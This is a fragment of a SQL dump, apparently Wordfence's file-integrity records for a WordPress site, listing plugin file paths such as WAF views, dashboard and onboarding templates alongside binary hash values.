('ù—8K°ç ?O]Ê¹Y', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'º§\ZlY^[F\rÈ2xÊ»', 'Ï6=““ØS“q®-5 )¸«E¿L}A¤ViA]ŸŸŽ', '', 0, '?'),
('xV‚Mšé>–nÙ{O–ÇŸ', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åI,0`ç-=¸OxH§¼', 'â°m¼WkaËö—è2ƒSjÔ>¨Ë·…"Çwù<', '', 0, '?'),
('AØ»#¨²¹"óàÅj­', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1¦±t¨*´Ô©9Ü‹Ôº', '¿«Ý‹ÜO)úÿÿZ–‡zÚ;s<*¬¢Ïä]½Üó~˜', '', 0, '?'),
('Q§Û÷6K4öÊ¨€ÒðH', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ùài0—§Ý\Zˆ_ìc', 'SBYülÂMÐª“Dæ’§ù}Ìñ\Z™Ù+˜ª>ì#§};', '', 0, '?'),
('rI\0yg×E!€£û2\0C', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„Ä¼« 0æàÍ±Ï\Z4[©', '²a‰ ?''œJ%;—NÄ¯9lè\\tß°¼|Xïö¦', '', 0, '?'),
('j¯Ò)nƒQ8Þ®á¬DŒ', 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'vu×²·´âu’xJôB|', 'óüü_\\×O•˜ytnŽøôûÅ’ŒZ•” Õ´', '', 0, '?'),
('ïÅ{´ú \rðSlÅ¿é	', 'wp-content/plugins/wordfence/views/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£E"xKÊê{Ç8ödS³', 'C‡¾ö½''r…9½ì@âK¡Þ†t¡ª™öâ§w#@kº', '', 0, '?'),
(':¿fØ?bjƒ¿.‹Ÿ¹', 'wp-content/plugins/wordfence/views/blocking/block-list.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/block-list.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'tŸ2Ç&s ¿Ô¨«Šý¿', 'ÈÕI·#¨ëe‘¡º–²ÃrÐ`-u—Wù¦¶QQ', '', 0, '?'),
('rù7²È/y*¸aÚ›P] 0', 'wp-content/plugins/wordfence/views/blocking/blocking-create.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/blocking-create.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'B¡VŸí³F×ä''£èjno', '±\réKœaTžE½f<MhM¹ÐÀFŒõ(ì›äÜÕï4P¾', '', 0, '?'),
('fp†ú“êçÈjóH›''', 'wp-content/plugins/wordfence/views/blocking/blocking-status.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/blocking-status.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§šDç•ãaØòÓG]:', '^Ä¶ÖU•Oë95E¡Ö¹È~Á»zåqMçqÈ3@', '', 0, '?'),
('¨h¹x×*(½&¾ëÃkO’', 'wp-content/plugins/wordfence/views/blocking/country-block-map.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/country-block-map.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡uœÁyGF¡,{–ŒXÁz', '%Ôœ5–;º”û§öx“ˆ^)Ÿ‹¨G(…ào', '', 0, '?'),
('4®ÚÛ¥‘;»0Š.*', 'wp-content/plugins/wordfence/views/blocking/country-modal.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/country-modal.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(G"n¾rPiÄ)ß¬àj', '\r‰FA†me a	r•-•w‡YËEÖuÊÎãôñu', '', 0, '?'),
('ãm5^¹ÛÀÇuÈê°9>', 'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ß(tî×„\r4ÔÇcR', '¯^àVô£x‹þÍ_:Æák	¤Ü(£á?½BË!', '', 0, '?'),
('1?oœxøç<È?éÍâ6', 'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?v@½Y aØpv¹²Š', 'pªšæZÊ‡Oä¦FïMáß4ÆV92êQP¶þ\0ñë¢íØ', '', 0, '?'),
('4To®â‚iEøåt‹', 'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7ös\r>J™»(¡œ€EÍ', 'ÓK°¦úõ(wœ²B$¦\r¤s«®ì¤‡!üà¨¿¨ËD', '', 0, '?'),
('2Ä£­ˆ_½Dã”xˆ“¤', 'wp-content/plugins/wordfence/views/common/block-navigation-option.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/block-navigation-option.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'O³ÂøýÎª~˜}t.ïK', 'MªN„³ë¦›¥š‘F`\r9÷ö Ó«ërPô²,Q', '', 0, '?'),
('Ïß,”Ÿ´@ÎÖóºQÌ', 'wp-content/plugins/wordfence/views/common/indeterminate-progress.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/indeterminate-progress.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'I·æ"Ýsg½4ˆ\\(±8', '´@™îýZn"Î¾~žQÕ”ºÃ8“sãPŠ¶ž\07å3', '', 0, '?'),
('BUj”v\\Ñ£â•ááè(«', 'wp-content/plugins/wordfence/views/common/license.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/license.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨è°:8õ´šÜÞ^¢r', 'ÏfòB-h‡Ÿ¾™í^È>Aãïð”nH0Ã\r&Ëó', '', 0, '?'),
('­ùll¸„ƒxèL,7WÊNÛ', 'wp-content/plugins/wordfence/views/common/modal-prompt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/modal-prompt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0JÙ.H[|á—E3$d”', 'ˆ\ZÀz%ìªÃê;çå¯ú—o©nÐÞm&±ÕÊ÷µ¯Â', '', 0, '?'),
('÷]pÝRŸ/$¸1ö', 'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á+„$B`wäÆ•´‘á', 'ÿaºÄÝâ6ãìÍÎŸªËîv]z5Œ’ÚÁ”¾\rpñc ', '', 0, '?'),
('žxÃÂ|s¾ƒÄ×KŸaõ', 'wp-content/plugins/wordfence/views/common/page-help.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-help.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à!ïÈ÷YJ¡ðJk›Íô', '› \Z=¡DB×£§	%%A?Ow›Ð*/Þ~u', '', 0, '?'),
('­ÜË‹Ý_o!''Úuœáør', 'wp-content/plugins/wordfence/views/common/page-tabbar.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-tabbar.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qèØÂVdÐŒX@q›È™ÍÄ', 'SþüÐØªAäéàÓ¤Ë@5°úÇò|ˆ~ú?KBK9U', '', 0, '?'),
('qqC¸¢$²žàý¨ƒ@', 'wp-content/plugins/wordfence/views/common/page-title.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/page-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5«ó*<ðX;øø', 'N5%žº=åœkUHVKÁAþlEI"3è¸jÕÓþ', '', 0, '?'),
('ÁÚ%G]fÓ@Í%ÊZÜÍ', 'wp-content/plugins/wordfence/views/common/section-subtitle.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/section-subtitle.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'n^\rÁñ#f–šst„‚W\Z', ':ËtaQE´&Íœ˜³îßÄsÙ¡\nGb\\Z S1{°', '', 0, '?'),
('¡%¥°?’ê•õ¨)Ò', 'wp-content/plugins/wordfence/views/common/section-title.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/section-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è²ø!z˜à‘ÏÀ¶˜ðÌ¥', '+£ÿä«AÍS—¯ÑŸbH´Âæ¿³Á$V¯+¿ÜNÎ‚Ã', '', 0, '?'),
('úw	¥š+»jì¤ûÀ', 'wp-content/plugins/wordfence/views/common/status-circular.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-circular.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ðâßº)ß.=£·¥g', 'q4^"-ú9†æ‡áí\nd1q¬‘ˆèO,íùÇ', '', 0, '?'),
('ü^ùO|'':QÇ™EçÝð', 'wp-content/plugins/wordfence/views/common/status-critical.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-critical.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÜR¦/C[€¶å…]—u%ý', '®WçªíëB&6˜9õgžk_¢ ŸEFý6ÉI', '', 0, '?'),
('«³sùÕŒQ±¶7oéÃô', 'wp-content/plugins/wordfence/views/common/status-detail.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-detail.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`Ufxy9â9”ùg4Á½', '¸åïEèFËjÕ—&\n¶ôE¶¢&JÕŸgWk.Ž‹ºT/', '', 0, '?'),
('#æ7µírÉYÐ\0¼ái', 'wp-content/plugins/wordfence/views/common/status-tooltip.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-tooltip.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'F‰òfZíØPIR&iæ§é', 'ùEQtY€=ÇÀj.#eWãˆ¤A3QcPýðüTÛ', '', 0, '?'),
('ŸD²¸d.PË´{-yoÓg', 'wp-content/plugins/wordfence/views/common/status-warning.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/status-warning.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥µkR¹f,ïJªÁÞk«', '¹¼f‘!§Ù\rWeŒ¥=?õÛK¤›jP&é*yÖ|', '', 0, '?'),
('pÌ“0¤2@ãØPFÎtk', 'wp-content/plugins/wordfence/views/common/unsubscribe.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/common/unsubscribe.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y:h3ƒ>½½a Ý‘¶4~', 'Eèùqú¸´ËTg»çO>F-ëÅOú(ÍIÆšZ£¿z', '', 0, '?'),
('Mx1Ç‹Tm¾R_2o', 'wp-content/plugins/wordfence/views/dashboard/global-status.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/global-status.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ë«''½mÌ`£0>ð+#¢Î', 'úœœÞðçæ˜ÃÄpûøÁ³çPv?ZÇF²êQQcj', '', 0, '?'),
('{[ã/Á°³†Ú‘Îý„', 'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/option-howgetips.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ñ5å¤‘=²MwKÂê…h', '‘jÐT59O½DÃ÷P¸ÅIê !šÈÕæç­8"L‚Þ', '', 0, '?'),
('b‡†êE„Ÿ£»º4t=', 'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-alert.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÊÌ»o«ìwG>p', 'ÊI¶`I^{çP× h„QøÏe:sG^›¤8£sÄš', '', 0, '?'),
('~È¾/úmÚÖ€Í!üì', 'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ØsÉûX]û[sC>QÔÛ', '³>‹Ê_c\ZJ+ÉÞ¡¬¶aœø§…³–¨ÃUmv)œlg', '', 0, '?'),
('Ì‹¸qÈB3aêYïç-ö', 'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'û\0`''}·(ƒ¥ƒb·†ŒA#', 'c,€Bp£2ý8 Õí¨0j‡7}hp-ùòå®†', '', 0, '?'),
('Qù.Ã¬¼\\¦‚ëûXeOI', 'wp-content/plugins/wordfence/views/dashboard/options-group-general.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-general.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(ñt*Š-6ÑÙ€X‹„', 'mVµdòhÙI÷âˆ‚Îd­š“ïTKß{ô¥z¿ \ZÈ', '', 0, '?'),
('´‚,é×M†ø;vûû', 'wp-content/plugins/wordfence/views/dashboard/options-group-import.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-import.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J­™uîK.£á5›?‹g', 'èŽîè4š«Ém¥ dßDšà˜X<ÕÐ"y1U8$pÉê', '', 0, '?'),
(' 5ÔñrD›g»ç±ƒ¾', 'wp-content/plugins/wordfence/views/dashboard/options-group-license.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-license.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷øŒ¤‰§)åžðÜUá½', '=eà¯:Þz)z¡:ð]:žÍ¼@Ì{´\0ýþ•ÆèÜ', '', 0, '?'),
('ž]oMð¢seªªJ4È', 'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ÿo†þh5ƒˆ\rxÜ–N', '6y\ZuðÏ…;ç	­0¤~êrs1Jÿ9ŽÖX²‘òJžˆÅ', '', 0, '?'),
('„œ‚P»¼ÝM…Ëˆ=U', 'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ê¿m€\\m10ø‘f*µ)', '	möÉYÜ_áÝçË\\''.º¥]¯»»WyW0÷‹0', '', 0, '?'),
('È7˜\0ŽùttŠ².', 'wp-content/plugins/wordfence/views/dashboard/status-renewing.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/dashboard/status-renewing.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hwBí®îïþe (›º', '‰Ôì^K$¼ÓÜú1\0¤nÆ„&äiM{ç«$Œ^àŠh‰', '', 0, '?'),
('YBt\nª\ncåÝŸ.µývi', 'wp-content/plugins/wordfence/views/diagnostics/text.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/diagnostics/text.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ü¯¦ÂÔMžúkÈ', '· ''Ð19ßÍ\Z³ÔÄ“4''™Ÿ±‰î±|Ë}EÏ\Z™U', '', 0, '?'),
('OSïYÓWz!8õÊ£j±', 'wp-content/plugins/wordfence/views/gdpr/banner.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/gdpr/banner.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>6¢9!øG÷Ùz®>òS', 'ùZ¼QÆaÌ¿ù|ê£ž`!ªCÐè2CÊKµ%#ül¼', '', 0, '?'),
('QƒþcmÖuX\Z3ûB+‡žX', 'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$›mRÍ_»Ÿ`éW6Ë\0', 's)W´?PÓŽàÿB›*?xóûBZºìdÉ—äeZÙž{', '', 0, '?'),
('[(•ÆWéc¡‹¨µÀ¤äG', 'wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/offboarding/deactivation-prompt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ËXWñ´Ãb‰K8‚Åòi»', '.«ù¹å77¶×ù5ØO­nm“¿g×ô‰L²IÓ/we', '', 0, '?'),
('ŸBâÔè™ô!³¹vÝ¡É¶', 'wp-content/plugins/wordfence/views/onboarding/banner.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/banner.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áËÐé]«bÿyc~ñàKw', 'šƒá•ó\Z°TîDi.Âqs“Õ¶® ¢BÜÃ`-pýnN', '', 0, '?'),
('í–øm×”ÔÊF@$€~r', 'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'û+#"bMõîBLùK[ì6¡', 'Sî™ü‰kö!,BO—#	¹èQdzÿ{w-‰z', '', 0, '?'),
('°/7›Ã±ãcxîÙpŸ–g', 'wp-content/plugins/wordfence/views/onboarding/fresh-install.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/fresh-install.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '?—-Vf¡×O,Û`à0õ', ':ðë‚!¦:i¢ÌD7Bißs™Ž†¬w4Þ>æƒ=Yn_', '', 0, '?'),
('ø;Ç%N!9\nL&N„Þçž', 'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åÙ9fÇ"ƒ&‡±Ô	à8', '—JaŸˆ ^žÎeþÆõ5þ)zìQØ‚”#Øl24Ú<Ž', '', 0, '?'),
('º3ž,’˜×cv‹k–’Ñø', 'wp-content/plugins/wordfence/views/onboarding/overlay.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/overlay.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ðœ¨´þÙÁºñÞésÃ', 'ÔÀa:£Fž¹âV¢WÜ5W¡<nôo`úø', '', 0, '?'),
('+´\ZD€–Ze}É', 'wp-content/plugins/wordfence/views/onboarding/plugin-header.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/plugin-header.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6EiXl…™˜¿(%AÂ\\·a', '²§PRl³òÕ™‡Àg§¾\\§@“çEMY»s\0„£', '', 0, '?'),
('>,·	ö¾¤\0~t½‘ÉhÚ', 'wp-content/plugins/wordfence/views/onboarding/registration-prompt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/registration-prompt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Õ\\ƒÝ@²\r‚.ŠÐ·+', '‚#s-•xŸîe¡ºC`Ý×õ!V¼ÉpÝÑ¬YÚ‰ãj', '', 0, '?'),
('''Ac¸´å,	~—6ØøÜ¦ã', 'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/onboarding/tour-overlay.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™:è¾½%› Ÿ);§\0', '\ZÈó''Ä¡ë§ªÓÊ¶.s''Æè­sdÜ4§^´ÓI', '', 0, '?'),
('¤Zò÷ód*–èY¡öÚ˜¡', 'wp-content/plugins/wordfence/views/options/block-all-options-controls.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/block-all-options-controls.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'òišw‡Ù»IˆßAì{é§[', 'ù/çoÒÁÂÑ¶‚Ï‰ú€×àO¸my\ZãwnJÉ‹‚Ç', '', 0, '?'),
('æÃ´˜eÒ•÷h‚V"€', 'wp-content/plugins/wordfence/views/options/block-controls.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/block-controls.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àd€\nYOÝ%ˆsº¦', '\r–''UkÂƒ¤3¢4xP‡¢Í€ë%íö£§~ÖÌù\Z}', '', 0, '?'),
(',à\Z¼J''ªAWh€Ì', 'wp-content/plugins/wordfence/views/options/option-label.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-label.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''`Ã¸ìéÙÛaØé åá', 'ø¸æñÝy–óDFR#\\\\F/­ýG%RY¡Òx!˜B6a', '', 0, '?'),
('·`™`''Îl`=èê¢X(', 'wp-content/plugins/wordfence/views/options/option-select.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-select.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J*EÕ%v	NÃa!‹¤Uw', 'Mü«#3‰a@xhÇÀ s\r5qBÒNÙ£©X#Àò’', '', 0, '?'),
(' o¬Æ•ŸÌt_¯º\0.Í', 'wp-content/plugins/wordfence/views/options/option-switch.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-switch.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žþž+’‹''|ìª', 'ÓCÑZ› êhauðúÝ£»KèCif!…½—¡Ž''~F­p', '', 0, '?'),
('Ò–6ŠÐòMÖ¦¶®5wHÌ', 'wp-content/plugins/wordfence/views/options/option-text.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-text.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'k»ú‘ßŸ*×‰k+;8', '7ÆÃèM$<ì÷rO9ªGjÞÁç¿ÞEyžöQ*+÷3', '', 0, '?'),
('ÂYm–Rôl«X\0ø†Ù:', 'wp-content/plugins/wordfence/views/options/option-textarea.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-textarea.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°Ž„æw\n£Mus•ô žµÌ', 'O¾Š¯=~jc#ý6Ž¿LçªœÝÊÑÄasòWÕOQ-', '', 0, '?'),
('2ê0mKš:rÂ²\\0\nBÙ', 'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'x—£±9/½¢Z“hò6¹\n', 'óþJ<<¢ö¾x?°#òþoü²†º‚Jn8²:jù„', '', 0, '?'),
('êd\nºv;èO1:®®,Tn', 'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-multiple.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ò’¼Ð¾µ6¤Êþ¯¢ã', 'rÌ\nzÉè•é>¢˜½gãiÔ\ru÷´u<²ä›F', '', 0, '?'),
('.ˆéº‰D0‰u©L-c•', 'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-segmented.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›ÜÖBÊW#”è#ü®é', 'Õü^À<µ´4óÌe,ÀÔ\0úÛlî„’ëÖ\râ!d', '', 0, '?'),
('$%#€Æ_‚U»_dÍ', 'wp-content/plugins/wordfence/views/options/option-toggled-select.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-select.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '	Áê|C ¾w@ãˆÊm¢', '5ªÃ£\0ÓŠVbA†Å‡åäüúŽ.Zû;Mzüq]¬¡', '', 0, '?'),
('\rzÇ¾±ŠDÖDëžÓ', 'wp-content/plugins/wordfence/views/options/option-toggled-sub.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-sub.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à¿÷m“º­ÃÀô_á‚', '¦»RÈ†F\nDî~HîŽ08),:llWøn®\rc²ß', '', 0, '?'),
('DîT[Ç-ÂáýUáöøð°', 'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled-textarea.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'æ=ó—q(éåtž“Ý£Ë»', 'at¥Ã}(Ä›0†oÃŸ%ì3ØÇðpÈu~üÄ¥', '', 0, '?'),
('*ê	ì¯Ä…ÉÎüßã\\ã¹', 'wp-content/plugins/wordfence/views/options/option-toggled.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-toggled.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'D“u¹\nL„»‡œðûÂE', 'L8MÐú0ƒ=ŽYïkbŸ³Õ|59Ôb+ä–z:4', '', 0, '?'),
('úˆ7Ú”!õ2¦x%’XNú3', 'wp-content/plugins/wordfence/views/options/option-token.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/option-token.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·x¯EJRÁ`›ù5\ZêC\n', 'óˆ_ú—›N–R±Ï¦gîNŽr™Ä{ÿŽoXÓ®', '', 0, '?'),
('Æëª³@Ñ ›=¤Åy`', 'wp-content/plugins/wordfence/views/options/options-title.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/views/options/options-title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢Û˜ä©ÖÉjçŽ“Ý†E', 'îûþ£Kxf›»´Ÿ„“ê+eÇ–Ù­®ÊŒõ‰ù¼m', '', 0, '?'),
